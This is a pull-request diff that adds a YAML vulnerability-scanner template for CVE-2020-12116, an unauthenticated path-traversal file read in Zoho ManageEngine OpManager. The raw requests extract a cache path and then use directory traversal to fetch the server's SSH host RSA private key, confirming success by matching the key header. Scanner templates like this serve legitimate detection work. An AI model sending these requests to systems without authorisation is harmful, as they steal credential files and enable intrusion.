Merge pull request #516 from dwisiswant0/add/CVE-2020-12116

Add CVE-2020-12116

cves/CVE-2020-12116.yaml

@@ -0,0 +1,54 @@
+id: cve-2020-12116
+
+info:
+  name: Unauthenticated Zoho ManageEngine OpManger Arbitrary File Read
+  author: dwisiswant0
+  severity: high
+  description: Zoho ManageEngine OpManager Stable build before 124196 and Released build before 125125 allows an unauthenticated attacker to read arbitrary files on the server by sending a crafted request.
+
+  # References:
+  # - https://github.com/BeetleChunks/CVE-2020-12116
+
+requests:
+  - raw:
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+        Accept: */*
+        Connection: close
+
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}:8060
+        Accept: */*
+        Connection: close
+
+      - |
+        GET endpoint../../../../bin/.ssh_host_rsa_key HTTP/1.1
+        Host: {{Hostname}}
+        Accept: */*
+        Cache-Control: max-age=0
+        Connection: close
+        Referer: http://{{Hostname}}
+
+      - |
+        GET endpoint../../../../bin/.ssh_host_rsa_key HTTP/1.1
+        Host: {{Hostname}}:8060
+        Accept: */*
+        Cache-Control: max-age=0
+        Connection: close
+        Referer: http://{{Hostname}}:8060/
+
+    extractors:
+      - type: regex
+        name: endpoint
+        part: body
+        internal: true
+        regex:
+          - "(?m)/cachestart/.*/jquery/"
+
+    matchers:
+      - type: word
+        words:
+          - "BEGIN RSA PRIVATE KEY"
+        part: body